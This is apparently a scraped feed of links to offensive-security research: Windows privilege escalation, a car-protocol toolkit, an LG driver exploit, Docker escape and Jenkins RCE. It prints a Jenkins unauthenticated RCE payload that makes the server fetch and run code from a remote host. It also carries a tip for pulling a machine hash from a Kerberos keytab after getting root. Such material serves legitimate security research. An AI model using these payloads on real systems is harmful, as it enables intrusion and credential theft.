Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation for Local Elevation of Privilege
https://googleprojectzero.blogspot.com/2018/08/windows-exploitation-tricks-exploiting.html
https://googleprojectzero.blogspot.com/2018/08/windows-exploitation-tricks-exploiting.html
Blogspot
Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation for Local Elevation of Privilege
Posted by James Forshaw, Project Zero And we’re back again for another blog in my series on Windows Exploitation tricks. This time I’ll...
https://github.com/schutzwerk/CANalyzat0r
CANalyzat0r: A security analysis toolkit for proprietary car protocols
CANalyzat0r: A security analysis toolkit for proprietary car protocols
Got a root shell on a domain-joined Linux box? Stumbled on this PS script yesterday. Run this against /etc/krb5.keytab to extract the machine hash and authenticate to AD and run your favorite enum tools :)
https://gist.github.com/0xhexmex/2ac1dee8a13b86668cfa7b849c52b210
https://gist.github.com/0xhexmex/2ac1dee8a13b86668cfa7b849c52b210
Gist
Parses Kerberos Keytab files
Parses Kerberos Keytab files. GitHub Gist: instantly share code, notes, and snippets.
CVE-2019-8372: Local Privilege Elevation in LG Kernel Driver
http://www.jackson-t.ca/lg-driver-lpe.html
http://www.jackson-t.ca/lg-driver-lpe.html
Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
Orange
Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
This is 🍊 speaking
Jenkins Unauth RCE
/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='tld', root='http://[]/')%0a
@Grab(group='', module='poc', version='1')%0a
import rn;
/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='tld', root='http://[]/')%0a
@Grab(group='', module='poc', version='1')%0a
import rn;
CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host
https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html
https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html
blog.dragonsector.pl
CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host
Introduction The inspiration to the following research was a CTF task called namespaces by _tsuro from the 35C3 CTF . While solvin...